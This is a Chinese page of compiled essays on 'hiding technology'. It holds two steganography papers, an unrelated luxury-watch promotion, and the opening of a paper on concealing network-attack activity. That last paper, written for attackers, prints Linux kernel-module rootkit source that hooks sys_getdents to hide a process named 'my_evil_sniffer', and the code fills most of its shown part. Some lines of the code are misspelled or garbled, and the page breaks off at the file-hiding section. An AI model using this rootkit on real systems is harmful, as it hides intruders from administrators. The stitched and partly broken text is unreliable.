(2)按密钥分类。若嵌入和提取采用相同密钥,则称其为对称隐藏算法,否则称为公钥隐藏算法。

(3)按嵌入域分类。主要可分为空域(或时域)方法及变换域方法。

(4)按提取的要求分类。若在提取隐藏信息时不需要利用原始载体,则称为盲隐藏;否则称为非盲隐藏。

(5)按保护对象分类。主要可分为隐写术和水印技术(见图5)。

图5 按保护对象分类

隐写术的目的是在不引起任何怀疑的情况下秘密传送消息,信息隐藏技术在通信中的应用主要是指隐写术。数字水印是指嵌在数字产品中的数字信号,可以是图像、文字、符号、数字等一切可以作为标识和标记的信息,其目的是进行版权保护、所有权证明、指纹(追踪多份拷贝)和完整性保护等。匿名通信就是寻找各种途径来隐藏通信的主体,即信息的发送者和接收者。

2信息隐藏技术在电子通信中的应用前景

当前,我国在信息安全的应用方法和研究领域方面,大多还是采用传统意义下的信息加密技术,例如用hash函数,伪随机序列等密码学技术等,这种信息安全模式存在两大弊端:一是信息安全无法保障,不能保证加密的信息不被破译;二是耗资巨大,现代先进信息安全技术往往对设备要求较高,这在很大程度上增加了对基础工业的投入。因此,对信息隐藏新技术与新模式的研究和发展,在信息安全领域具有很大的潜在价值。

2.1将被动保密变主动隐藏。新型信息隐藏技术使需要保护的消息由“看不懂”变为“看不见”;将传统的“让攻击方解密不了”的信息加密理念提升为“让攻击方想象不到”的层面,从而使通信中传统的保密、预防的被动模式,转型到既安全又能够迷惑第三方的主动模式。

2.2现有传输条件下的低信息截获率。采用先进的信息与信号处理技术,以及多级包装式信息隐藏新模式,可在很大程度上降低现有传输条件下秘密信息的截获率。举例而言,假如需要传输秘密文本信息A,我们将该文本A隐藏于另一文本信息B中,之后,我们将该文本B隐藏于图片C中,再将图片C隐藏于图片D中,最后将图片D隐藏于普通话音中。即文本A(隐藏于)文本B(隐藏于)图片C(隐藏于)图片D(隐藏于)普通话音。通过上述方式,一是攻击方不会想到秘密信息正在以一种特殊多级包装形式进行传输,也就没有试图解密的意图;二是即使前几层包装信息(B、C、D)被破译,攻击方自以为解密成功,从而放弃继续解密的意图,却不知道真正的秘密信息(文本A)并没有被解密出来。

3结语

目前信息隐藏技术是保障信息安全的关键技术,在国内外都得到了广泛的应用,并且都取得了一定成绩。信息隐藏技术作为一种重要的信息安全技术,潜在的价值是无法估量的, 特别是在迫切需要解决的版权保护等方面, 可以说是根本无法被代替的, 相信其必将在未来的信息安全体系中发挥越来越重要的作用。

参考文献:

[1]王丽娜等.信息隐藏技术与应用[M].武汉:武汉大学出版社,2009.

[2]杨波.信息隐藏技术及其应用[M].北京:科学出版社,2002.

[3]吴志军等.语音隐藏的研究及实现[J].通信学报,2002,23(8):99-104.

[4]袁开国等.音频信息隐藏技术研究[J].中兴通讯技术,2007,13(5):6-9

[5]李跃强,孙星明.一种用音频作载体的信息隐藏算法[J].计算机应用研究,2005,(5):29-33.

隐藏技术范文第8篇

技术的含义是什么?诸位匠师巧夺天工的设计,

科技发展下的材质不断飞跃,或者是传承经典而表达的历史意义?

除去这些,让我们放下一颗浮躁的心,逐个体会技术来带的情感,

这是一种基于人类创造新事物的共鸣,也是除去自然之外的另一种审美。

浪琴

康铂系列计时男表

这款计时秒表直径41毫米,精钢表壳及表链,内置L688导柱轮机芯。银色表盘上刻有1个阿拉伯数字刻度和11个夜光小刻度,显示时、分,9时位置设小秒针,30分钟累计表盘设于3时位置,12小时累计表盘设于6时位置,日期显示窗设于4:30分位置。与康铂系列所有表款一样,这款腕表防水功能达5个大气压,螺旋式表背配以蓝宝石水晶。

爱彼表 Jules Audemars系列

爱彼独家擒纵系统腕表

透明的表面设计使精彩绝伦的Cal.2908机芯尽收眼底;具有纵深感的3D立体设计使小秒针表盘成为目光的焦点。拥有267个组件的全新手动上炼机械机芯,将高级钟表的本质完全展现无遗。具有超高摆频的爱彼独家擒纵系统追求无懈可击的精准度,安置于最醒目位置的小秒针表盘,从视觉上呈现以准确为最终目标的钟表哲学精神。

罗杰杜彼La Monégasque

蒙特卡罗系列月相万年历

此款腕表由机械驱动着时间的记录,搭配具有358个零组件的RD821J机芯,打造缩影时间的巨大成就。星期、月份、日期、闰年和月相:天地因此掌握手中。此腕表操作简便,多项显示功能清晰易读:表盘完美体现技术和美感的平衡与和谐。44毫米玫瑰金表壳,防水深度为5巴(50米),赋予腕表浑然天成的自然优雅。

积家

Master Ultra Thin Perpetual

超薄万年历大师系列腕表

时间显示清晰易读、一目了然,绝无差错。除时针、分针和中央秒针外,腕表还拥有三个专门显示万年历的计数器:星期显示设于9点钟位置,日期显示位于3点钟位置,而6点钟位置则用于显示月份。通过Master Ultra Thin Perpetual超薄万年历大师系列腕表7点钟位置小窗口,能读取完整的四位数年份。结构布局完美均衡,绝对和谐。

天梭

PRX系列

沿袭天梭运动系列精准时计的传统,PRX系列多功能计时码表更配有60-500公里/小时测速尺,相比于普通腕表的60-400公里/小时测速尺测量范围更大也更实用。与PRX系列中的X相对应,防水100米的性能让佩戴者在深蓝世界中也能一样自由遨游。流线型的表耳佩戴舒适,表冠处的保护装置能防止腕表最脆弱的部分碰撞受损,独特的设计让运动更加无拘无束。

万国

沙夫豪森IWC万国表全新工程师系列腕表

2013年工程师系列腕表的两条设计路线,其一沿用精钢表壳,刚劲、简洁;其二为运动风格,表壳采用创新型材质,灵感源自F1TM一级方程式的材料库。在全新推出的工程师系列中,IWC万国表通过运用典型的赛车材质,如碳纤维、陶瓷以及钛金属,对赛车主题加以演绎,并且腕表外观上借鉴了现代F1TM一级方程式赛车的驾驶舱。玻璃边框与表壳之间采用螺丝固定,进一步彰显腕表的高科技动感特质。

欧米茄 海马系列

海洋宇宙Ceragold腕表

隐藏技术范文第9篇

关键词:信息隐藏 通信 信息安全

中图分类号: TP309.7 文献标识码: A 文章编号: 1003-6938(2011)04-0062-04

Research on the Application of the Information Hiding Technology in Communication

Qiao Mingliang Song Li (People's Liberation Army No.68026, Lanzhou, Gansu, 730020)

Abstract:The emergence and development of the information hiding technology, have exploited a new field for the research and application of the information security. Compared with the information encryption technology, the principle and characteristics of the information hiding technology are discussed in detail. In addition, the application of the information hiding technology in communication in the future is discussed also.

Key words: information hiding; communication; information security

CLC number: TP309.7 Document code: A Article ID: 1003-6938(2011)04-0062-04

1 引言

随着通信技术的飞速发展,信息安全正逐渐成为一个重要的研究课题。传统的信息安全机制普遍采用信息加密方式。但随着计算机软硬件技术的发展对加密信息破译能力的大幅提升,迫使人们对加密算法的强度提出越来越高的要求。此外,加密技术在一些领域日益呈现出一定的局限性,它在防止信息泄密的同时,也暴露了机密信息的存在,因此,容易引起攻击方的注意是加密技术一个不可避免的显著弱点。信息隐藏(Information Hiding)是信息安全领域一个新兴的研究热点,涉及感知科学、信息论、密码学等多个学科,并涵盖信号处理、扩频通信等多个专业技术的研究方向,它的出现和发展,为信息安全的研究和应用拓展了一个新的领域。[1 ] [2 ] [3 ]

信息隐藏的实现利用了数据文件(主要是多媒体文件)的冗余性和人类感觉器官分辨信息的能力有限性等特点,通过各种嵌入算法,将秘密信息嵌入到作为载体的多媒体文件中。[4 ] [5 ] 由于隐密载体与原载体在特征上没有区别,不易引人注意,从而容易逃过攻击者的破解,实现秘密信息的安全传输。因此,信息隐藏技术所具备的特殊优势决定了其可广泛应用于电子商务、保密通信、版权保护、拷贝控制及操作跟踪、认证和签名等各个信息安全领域。本文通过对信息隐藏与信息加密技术的比较,对信息隐藏技术的原理、分类、实施方法、具体特征等进行详细分析,并研究了其在通信中的应用前景。

2 信息隐藏技术的原理和特征

2.1 信息隐藏与信息加密

信息加密是利用密码学技术将机密文件进行加密编码,把明文变换成密文后,通过公开信道送到接收者手中(见图1)。由于经过加密处理的密文是一组乱码,当监视通信信道的攻击者发现并截获到乱码后,就可以利用已有的各种攻击方法对密文进行破译。这种方式虽然不易被解密,但通信易被第三方察觉,一定程度上向攻击者明确提示了重要信息的存在,所以容易引起攻击者的注意,进而遭受到干扰和攻击,导致密文通信失败。同时,即使攻击者无法对密文进行破译,也可在破译失败后将该信息进行破坏,使得合法的接收者也无法获取密文。

信息隐藏也称“信息隐匿”,是信息安全研究领域中的一门新兴的交叉学科,也是当前信息安全领域国内外各机构研究的热点方向。信息隐藏与信息加密的目的相同,都是为了保护秘密信息的存储和传输,使之免遭第三方的破坏和攻击,但两者之间具有显著的区别。信息隐藏技术是将机密信息秘密隐藏于另一公开信息(载体、宿主、掩体对象)中,即将秘密信息(嵌入对象)嵌入到另一表面看起来普通的信息载体中,然后通过该公开信息(隐藏对象)的传输来传递秘密信息(见图2)。第三方很难从公开信息中判断机密信息是否存在,即无法直观地判断所监视的信息中是否含有秘密信息。这种方式使含有隐匿信息的宿主信息不会引起第三方的注意和怀疑,降低了机密信息的截获率,从根本上保证了机密信息的安全。其关键技术主要是在确保宿主文件格式、质量和大小不变的前提下,将密文保存在该宿主文件中,且能对密文实现无损还原。

2.2 信息隐藏技术的原理

信息隐藏系统(典型模型见图3)包括一个嵌入过程和一个提取过程。在嵌入和提取过程中通常都会使用一个秘密信息来对其进行控制,使得只有合法授权用户才能对其进行操作,这个秘密信息被称为隐藏密钥,隐藏密钥在嵌入过程中称为嵌入密钥,在提取过程中称为提取密钥。

在嵌入过程中,信息隐藏者利用嵌入密钥,将密文添加到载体中,生成隐蔽载体。隐蔽载体在传输过程中有可能被隐藏分析者截获并进行处理。在提取过程中,提取者利用提取密钥从接收到的、可能经过修改的隐蔽载体中恢复出密文。在密文提取时,根据隐藏算法的不同,有可能需要载体,也可能不需要。

信息隐藏的研究分为隐藏技术和隐藏分析技术两部分。隐藏技术研究的主要内容是寻求向载体中秘密嵌入密文的方法;隐藏分析技术研究的主要内容则是考虑如何从隐蔽载体中发现密文的存在,从而正确获取所嵌入密文,或通过对隐蔽载体的处理达到破坏嵌入密文和阻止攻击方提取嵌入密文的目的,这一过程中使用的算法通称为分析算法,其中用于隐藏信息检测的算法又称为检测算法。

信息隐藏可在不改变原有通信设备的基础上实现,只需要在原通信系统的收发设备,增加信息隐藏/隐藏信息提取模块,便能够在完成信息隐蔽传送的同时,保持系统原有的通信功能不受其影响(见图4)。[5 ]首先获取密文信息,为进一步提高安全性,可结合信息加密技术对密文信息进行预处理,得到加密信息,之后可采取交织、纠错等编码措施。接下来,获取载体信息,如音频、图像、文本等原始宿主信息;如果采用的是变换域信息隐藏算法,则需要对载体信息进行相应的域变换;同时,为使接收端能对隐藏信息进行准确的盲检测,可在载体信息中加入同步信号。之后,便可将秘密信息嵌入到载体信息中、完成变换域的反变换,得到隐蔽载体。最后,由发送端将隐含密文信息的隐蔽载体通过公共信道进行传送。

接收端获得隐蔽载体后,对其进行相应的域变换、信道解码和解密后,就获取了所嵌入的密文信息。

2.3 信息隐藏技术的分类及特征

信息隐藏技术一般具有如下分类方法:

(1)按载体类型分类。根据信息隐藏所采用载体的不同,信息隐藏技术可分为文本信息隐藏、音频信息隐藏、图像信息隐藏、视频信息隐藏等。音频信息和图像信息隐藏是信息隐藏的重要分支。

(2)按密钥分类。若嵌入和提取采用相同密钥,则称其为对称隐藏算法,否则称为公钥隐藏算法。

(3)按嵌入域分类。主要可分为空域(或时域)方法及变换域方法。

(4)按提取的要求分类。若在提取隐藏信息时不需要利用原始载体,则称为盲隐藏;否则称为非盲隐藏。

(5)按保护对象分类。主要可分为隐写术和水印技术(见图5)。

隐写术的目的是在不引起任何怀疑的情况下秘密传送消息,信息隐藏技术在通信中的应用主要是指隐写术。数字水印是指嵌在数字产品中的数字信号,可以是图像、文字、符号、数字等一切可以作为标识和标记的信息,其目的是进行版权保护、所有权证明、指纹(追踪多份拷贝)和完整性保护等。匿名通信就是寻找各种途径来隐藏通信的主体,即信息的发送者和接收者。

2.3.1 基于音频信号的信息隐藏

基于语音信号的信息隐藏技术,以嵌入信息所采用的域为依据,可将语音信息隐藏划分为时域音频隐藏、频域音频隐藏、离散余弦变换(DCT)域音频隐藏,小波(Wavelet)域音频隐藏和压缩域音频隐藏等。[7 ] [8 ] [9 ] [10 ]这些方法各有其优缺点:时域和频域的嵌入方法相对容易实现,但健壮性较差;而DCT域和Wavelet域方法虽然透明性和健壮性均较好,尤其是在抵抗A/D、D/A攻击时具有非常优秀的表现,但其操作复杂,实现难度相对较高;压缩域隐藏算法具有较好的透明性,但健壮性相对较差。

(1) 时域隐藏。时域音频信息隐藏,主要是对音频信号的幅度或者音频文件结构进行处理,是较为简单的一类隐藏方法。它主要包括最低有效位(LSB, Least Significant Bit)算法及改进LSB隐藏、回声隐藏和音频文件结构隐藏等。其中,LSB隐藏的实现方法,是将待隐藏信息按一定的规律对音频数据的最不重要位进行替换,嵌入秘密信息,其容量较大,实现容易,但健壮性较差,甚至不能抵抗微弱噪声的攻击。基于回声的隐藏方法,是在音频信号上叠加一些微弱的回声,通过改变回声的初始幅度、衰退速度和时间延迟等来嵌入隐秘信息。

(2)频域隐藏。频域音频信息隐藏,是对音频信号进行离散傅立叶变换(DFT)变换,然后对音频的频域特征进行相关处理,以实现信息的嵌入,主要包括频域LSB隐藏、扩频隐藏、相位隐藏和频带分割隐藏等。其中,扩频隐藏借鉴了扩频通信理论,将待隐藏信息以伪噪声的形式扩散到整个音频通带上,因此透明性好,抗噪能力强,具有很高的实用价值。频带分割隐藏将音频载体的频带分割成无数个子带,充分利用听觉阈值和听觉掩蔽效应等人耳听觉特性,在听觉不太敏感的子带上进行隐藏,听觉透明性好,但频域透明性较差。

(3)离散余弦变换域隐藏。离散余弦变换域隐藏,是对音频载体进行DCT变换,然后对DCT系数进行相关操作,从而完成信息的嵌入,包括DCT域LSB隐藏、DCT域相位隐藏等方法。

(4)小波域隐藏。小波域隐藏,是对音频载体进行Wavelet变换,然后对其系数进行修改,以实现信息的嵌入,包括Wavelet域LSB隐藏、Wavelet域能量比隐藏等。

(5)压缩域隐藏。压缩域隐藏方法是近年来才出现的一类隐藏方法,主要目标是将信息嵌入到压缩算法的码流或相关码表中,如MP3哈夫曼码表,MIDI乐器码表等。

2.3.2 基于图像信号的信息隐藏

基于图像信号的信息隐藏技术主要有两大类[11]:基于空间域和基于变换域。

(1)基于空间域的信息隐藏。空间域隐藏技术多采用替换法,即利用秘密信息替换隐蔽载体中的不重要位,如载体图像上某些选定像素点的最低有效位的值,将其用隐藏信息进行替换。这类方法算法简单,信息隐藏容量大,但抗干扰能力较差,在进行数字图像处理和图像变换后,图像的低位往往容易被改变,使隐藏信息被破坏。

(2)基于变换域的信息隐藏。变换域隐藏是将载体信息转换到变换域,利用变换域的特性将秘密信息嵌入,再将隐蔽载体进行反变换。比较典型的有离散余弦变换隐藏、离散傅立叶变换隐藏、小波变换隐藏等。基于变换域的信息隐藏方法,健壮性较好,但计算复杂度较高,嵌入信息的容量较低。

2.3.3 信息隐藏技术的特征

信息隐藏应具备四个主要特性:[12 ][ 13] [14]

(1)透明性。这是信息隐藏的基本要求,载体在嵌入隐藏信息后没有明显的降质,不影响载体的感觉效果和使用价值;第三方从感官或通过计算机监测都不易觉察隐藏信息的存在。

(2)健壮性。在不严重损害载体的前提下,当经受常见的信号处理(包括有损压缩、滤波、调制等)、有意或无意的攻击(如非法攻击、篡改、删除等)或者信道中随机噪声的影响后,还可以提取出原始的隐藏信息。

(3)嵌入量满足要求。由于信息隐藏的目的是隐藏信息,因而隐藏算法能嵌入的数据量要大,以满足隐藏机密信息的需要;隐藏算法所需的时空开销代价要小。

(4)自恢复性。不需要原始载体信号,便能从载体中提取隐藏的机密信息;信息在经过各种操作和变换后仍能很好地恢复。

3 信息隐藏技术在通信中的应用前景

当前,我国在信息安全的应用方法和研究领域方面,大多还是采用传统意义下的信息加密技术,例如用hash函数,伪随机序列等密码学技术等,这种信息安全模式存在两大弊端:一是信息安全无法保障,不能保证加密的信息不被破译;二是耗资巨大,现代先进信息安全技术往往对设备要求较高,这在很大程度上增加了对基础工业的投入。

因此,对信息隐藏新技术与新模式的研究和发展,在信息安全领域具有很大的潜在价值。具体而言,信息隐藏技术在通信中的应用前景有以下几个方面:

(1)将被动保密变主动隐藏。新型信息隐藏技术使需要保护的消息由“看不懂”变为“看不见”;将传统的“让攻击方解密不了”的信息加密理念提升为“让攻击方想象不到”的层面,从而使通信中传统的保密、预防的被动模式,转型到既安全又能够迷惑第三方的主动模式。

(2)现有传输条件下的低信息截获率。采用先进的信息与信号处理技术,以及多级包装式信息隐藏新模式,可在很大程度上降低现有传输条件下秘密信息的截获率。举例而言,假如需要传输秘密文本信息A,我们将该文本A隐藏于另一文本信息B中,之后,我们将该文本B隐藏于图片C中,再将图片C隐藏于图片D中,最后将图片D隐藏于普通话音中。即文本A(隐藏于)文本B(隐藏于)图片C(隐藏于)图片D(隐藏于)普通话音。通过上述方式,一是攻击方不会想到秘密信息正在以一种特殊多级包装形式进行传输,也就没有试图解密的意图;二是即使前几层包装信息(B、C、D)被破译,攻击方自以为解密成功,从而放弃继续解密的意图,却不知道真正的秘密信息(文本A)并没有被解密出来。

(3)多种信息安全方式的综合应用。根据不同的实际应用环境和需求,可将多种不同的信息安全技术结合应用[15 ] [16 ] [17 ],进一步提高信息的安全度。例如,当需要传递秘密信息M时,首先将M利用密钥K通过传统加密技术,得到M。然后结合多变换域信息隐藏和加密技术,将载体信息C分成两部分(x,y),经不同的变换域(F(x),G(y)),一部分嵌入密文(?浊(F(x),M')),一部分将密钥经公钥算法加密后嵌入(?滋(G(y),K')),合并后得到隐蔽载体再进行传输。通过上述步骤,较大程度上增加了信息破解的难度,提高了信息的安全防护能力。

参考文献:

[1][12][15]王丽娜等. 信息隐藏技术与应用[M]. 武汉:武汉大学出版社,2009.

[2][5][16]杨波. 信息隐藏技术及其应用[M]. 北京:科学出版社,2002.

[3]吴志军等.语音隐藏的研究及实现[J].通信学报,2002,23(8):99-104.

[4]Artz, D, “Digital Steganography: Hiding Data within Data”[J].IEEE Internet Computing Journal,2001,(6).

[6][7][13]袁开国等. 音频信息隐藏技术研究[J]. 中兴通讯技术, 2007,13(5):6-9

[8][14]李跃强,孙星明. 一种用音频作载体的信息隐藏算法[J]. 计算机应用研究,2005,(5):29-33.

[9]Blackledge.J, Coyle,E: “Information Hiding by Stochastic Diffusion and its Application to Printed Document Authentication”.[C].ISSC Conference,Dublin, 2009:1-6.

[10]Marvel, L.M., Boncelet Jr., C.G. & Retter, C., “Spread Spectrum Steganography”[J].IEEE Transactions on image processing, 1999, 8(8):1075-1083.

[11]Wang, H & Wang, S, “Cyber warfare: Steganography vs. Steganalysis”[J].Communications of the ACM,2004, 47(10):76-82.

[17]廖琪男.基于Word和PPT文档图像的信息隐藏[J]. 计算机工程,2010,36(10):163-167.

隐藏技术范文第10篇

关键字:网络攻击;进程活动;隐藏;通道

中图分类号:TP393文献标识码:A文章编号:1009-3044(2007)04-10961-03

1 引言

攻击活动是一系列连续操作,若攻击时一不小心露出马脚,所有前面的攻击就会付诸东流,甚至会“引火烧身”。基于这样的认识,精明的网络攻击者特别注意隐藏攻击活动。

隐藏技术在计算机系统安全中应用十分广泛,尤其是在网络攻击中,当攻击者成功侵入一个系统后,有效隐藏攻击者的文件、进程及其加载的模块变得尤为重要。本文将讨论网络攻击活动中文件、进程、网络连接及通道的高级隐藏技术,这些技术有的已经被广泛应用到各种后门或安全检测程序之中,而有一些则刚刚起步,仍然处在讨论阶段,应用很少。

2 进程活动隐藏技术

攻击者在目标系统进行攻击活动时,产生攻击进程,如果不将这些攻击进程隐藏在系统中,就会被网络安全管理人员发现。例如,攻击者注册到某台Linux主机时,系统管理人员使用ps-ef | grep in.telnetd命令就可以察觉。攻击者可以通过修改系统的进程管理模块,替换进程管理核心模块,控制进程的显示,主要是netstat、ps等命令。下面给出Linux系统下隐藏进程源程序的例子:

extern void* sys_call_table[];

/*隐藏进程名称*/

char mtroj[]="my_evil_sniffer";

int (*orig_getdnts)(unsigned int fd,struct dirent *dirp,unsigned int coumt);

/*convert a string to number*/

int myatoi(char *str)

{ int res=0;

int mul=1;

char *ptr;

for(ptr=str+strlen(str)-1;ptr>=str;ptr--) {

if(*ptr'9')

return(-1);

res+=(*ptr-'0') *mul;

mul*=10;}

return (res);}

/*从task structure中获取进程号*/

struct task_struct *get_task(pid_t pid)

{ struct task_struck *p=current;

do { if (p->pid==pid)

returnp;

p=p->next_task; }

while (p!=current);

return NULL;}

/*从task structure获取进程名称*/

static inline char *task_name(struct task_struct *p,char *buf)

{ int i; char *name;

name=p->comm;

i=sizeof(p->comm);

do {unsigned char c=*name;

name++; i--;

*buf=c;

if (!c);

break;

if (c=='\\') {

buf[1]=c; buf+=2;

continue; }

if (c= ='\n') {

buf[0]='\\';

buf[1]='n'; buf+=2;

continue; }

buf++;}

while (i);

*buf=’\n’;

return buf+1;}

/*确认需要隐藏的进程*/

int invisible (pid_t pid)

{struct task_struct *task=get_task (pid);

char *buffer;

if (task) {

buffer=kmalloc (200,GFP_KERNEL);

memset (buffer,0,200);

task_name (task,buffer);

if (strstr (buffer, (char *) &mtroj)) {

kfree (buffer);

return 1; }

}return 0;}

int hacked_getdents (unsigned int fd, struct dirent *dirp, unsigned int count)

{unsigned int tmp,n;

int t,proc=0;

struct inode *dinode;

struct dirent dirp2,dirp3;

tmp=(*orig_getdents) (fd,dirp,count);

#idef _LINUX_DCACHE_H

dinode=current->files->fd[fd]->d_inode;

#else

dinode=current->files->f_inode;

#endif

if (dinode->i_ino= =PROC_ROOT_INO && !MAJOR (dinode->I_dev) &&

MINOR (dinode->I_dev) = =1)

proc=1;

if (tmp>0) {

dirp2= (struct dirent *) kmalloc (tmp, GFP_KERNEL);

memcpy_fromfs( dirp2,dirp,tmp);

dirp3=dirp2;t=tmp;

while (t>0) {

n=dirp3->d_reclen;

t-=n;

if ((proc && invisble (myatoi (dirp3->d_name)))) {

if (t!=0)

memmove (dirp3, (char *)dirp3+dirp3->d_reclen,t);

else

dirp3->d_off=1024;

tmp-=n;}

if (t!=0)

dirp3= (struct dirent *) ((char *) dirp3+dirp3->d_reclen);}

memcpy_tofs (dirp,dirp2,tmp);

kfree (dirp2);}

return tmp;

int init_module (void)/*module setup*/

{orig_getdents=sys_call_table[SYS_getdents];

sys_call_table[SYS_getdents]=hacked_getdents;return 0;}

void cleanup_module (void)/*module shutdown*/

{sys_call_table[SYS_getdents]=orig_getdents;}

3 文件隐藏技术

上一篇:电气安全技术范文 下一篇:网络意识范文